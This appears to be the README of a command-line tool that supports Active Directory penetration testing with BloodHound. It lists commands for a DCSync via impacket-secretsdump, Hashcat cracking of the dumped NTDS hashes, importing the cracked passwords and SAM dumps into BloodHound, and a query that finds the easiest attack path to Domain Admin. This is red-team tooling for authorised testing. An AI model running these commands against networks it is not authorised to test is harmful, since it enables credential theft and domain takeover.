Collection of various utilities to aid in Pentesting with BloodHound.
a) With pipx.
pipx install git+
b) With pip.
pip install --user git+
In any case complete the setup by installing the custom queries for BloodHound (based on work by @luemmelsec).
curl -Lo ~/.config/bloodhound/customqueries.json
Run Neo4j containers with Podman.
bloodhoundcli setup project-1
bloodhoundcli setup project-2 # first container will be stopped
Execute arbitrary Cypher queries against Neo4j.
bloodhoundcli query 'MATCH (u:User {enabled: true} RETURN u.samaccountname)' > ./users.txt
bloodhoundcli query -s 'MATCH (u:User {name: toUpper($stdin)} SET u.owned=true RETURN count(u)' << EOF
Run a DCSync from impacket-secretsdump with multiple wordlists and rulesets trough Hashcat.
Pre-created computer accounts are automatically cracked.
Specify --no-lm-brute
to skip LM hash cracking.
impacket-secretsdump -just-dc -outputfile corp.local -k -no-pass dc01.corp.local
bloodhoundcli generate-wordlist > ./custom-words.txt # made of usernames, descriptions, etc.
bloodhoundcli hashcat-ntds -t ./clem9669-wordlists/dictionnaire_de ./clem9669-hashcat-rules/clem9669_medium.rule -t ./custom-words.txt ./unicorn-hashcat-rules/unicorn\ rules/SuperUnicorn.rule -t ./weakpass-3.txt ./unicorn-hashcat-rules/unicorn\ rules/Unicorn250.rule -p ./hashcat.potfile ./*.ntds
assumes that the name of the NTDS file minus the.ntds
suffix is the FQDN of the domain. This means a DCSync fromdc01.subdomain.corp.local
should be namedsubdomain.corp.local.ntds
Import the DCSync output and Hashcat potfile into BloodHound (inspired by @knavesec and @syss-research).
This adds Credential
objects with nthash
, lmhash
and password
properties and HasCredential
as well as AssignedTo
edges between users and credentials.
bloodhoundcli import-ntds -p ./hashcat.potfile ./*.ntds
Import nodes for standalone computers and local users by leveraging the SQLite database of NetExec.
This includes nthash
properties from SAM dumps and AdminTo
as well as HasCredential
and AssignedTo
edges e.g. to identify local admin password reuse.
bloodhoundcli import-netexec ~/.nxc/workspaces/default/smb.db
Add historical session data as well as inferred RDP and local admin edges (original idea from @rantasec). First export recent logons from Windows Event Logs with Get-RecentLogons.ps1, then transfer the JSON output to your computer and finally import it into Neo4j.
bloodhoundcli import-winevents ./logons.json
Assign weights to edges in BloodHound (based on work by @riccardoancarani and @jmbesnard).
bloodhoundcli enrich
Now you can use queries like the following to find the easiest instead of the shortest path to Domain Admin.
MATCH (a {owned: true}) MATCH (b {highvalue: true}) CALL apoc.algo.dijkstra(a, b, '>', 'cost') YIELD path RETURN path;